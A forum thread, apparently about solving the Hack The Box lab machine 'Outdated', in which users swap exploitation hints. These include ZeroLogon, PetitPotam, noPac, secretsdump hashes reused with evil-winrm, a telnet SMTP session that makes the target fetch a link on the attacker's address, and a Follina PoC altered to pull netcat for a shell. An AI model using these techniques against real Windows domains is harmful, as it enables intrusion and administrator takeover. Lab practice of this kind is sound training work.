Outdated - HTB
Thanks, man
I will help you...
Reply
(August 13, 2022, 09:02 PM)yumi Wrote: sssssssssss
Reply
(August 13, 2022, 09:02 PM)yumi Wrote: :sleepy:
Reply
(August 13, 2022, 10:30 PM)yumi Wrote: If I get users I will warn you here with more details. I tried zero logon the first time, but I didn't realize that it had worked. I always try on a Windows machine, and with the name Outdated I tried several vulnerabilities; zero logon worked and the PetitPotam partially worked because there was no way to access certsrv remotely on this machine.


(August 13, 2022, 10:27 PM)JINXX Wrote:
(August 13, 2022, 09:41 PM)undeadly Wrote: Sadly, a bug on the box. The intended way should probably be dealing with hmail and group policies.
If the author fixes this fast, it will still be playable.
 

    Directory: C:\Users\Administrator\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/16/2022  11:05 AM                SQL Server Management Studio
d-----        6/16/2022  11:05 AM                Visual Studio 2017
d-----        6/16/2022  12:07 AM                WindowsPowerShell
-a----         8/1/2022   6:38 PM           7023 hmail_cleanup.ps1
-a----         8/3/2022   4:18 PM            978 install_updates.ps1
-a----        6/16/2022   6:51 PM            518 wsus_group_cleanup.ps1


*Evil-WinRM* PS C:\Users\Administrator\Documents>




How did you achieve a shell with evilwinrm?

Get the hash from secretsdump and access with evil-winrm.


In your "list of tryings" you may also include noPac. However, you need to own at least one standard domain user first.
The Anubis machine was (and still is) vulnerable to noPac -> where it was pretty easy to get a shell on the box and then impersonate admin in under 30 minutes in an "Insane" level box. Sometimes the author just can't cover all Windows breaches.
https://github.com/Ridter/noPac
Reply
(August 14, 2022, 10:34 AM)xiorat89 Wrote:
(August 13, 2022, 07:48 PM)fironeDerbert Wrote:
(August 13, 2022, 07:43 PM)Hacker2222 Wrote: quick root blood ..... must be cve for insta root?


Run this line by line and you'll get a ping on your port 80

telnet mail.outdated.htb 25
HELO client
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Subject: abc

http://10.10.XX.XX/XX
.
QUIT


Does this work for other people? This was the first thing I tried with swaks and manually, and I never got any request.

Yes, I did get a response, though I am not entirely sure how one is supposed to leverage that. I tried giving it a link to a follina docx, no luck.
Reply
(August 13, 2022, 09:02 PM)yumi Wrote: show me
Reply
I'm stuck on user
Reply
For users just use the Follina PoC from John Hammond.

Sendemail with attachment or link.

Change the script to download netcat from you and not from GitHub.


zero logon patched
Reply
(August 13, 2022, 08:59 PM)JINXX Wrote:
(August 13, 2022, 08:54 PM)yumi Wrote: zerologon worked


rooted

Can you help with more info on this, please?


Thanks
Reply
thanks
Reply

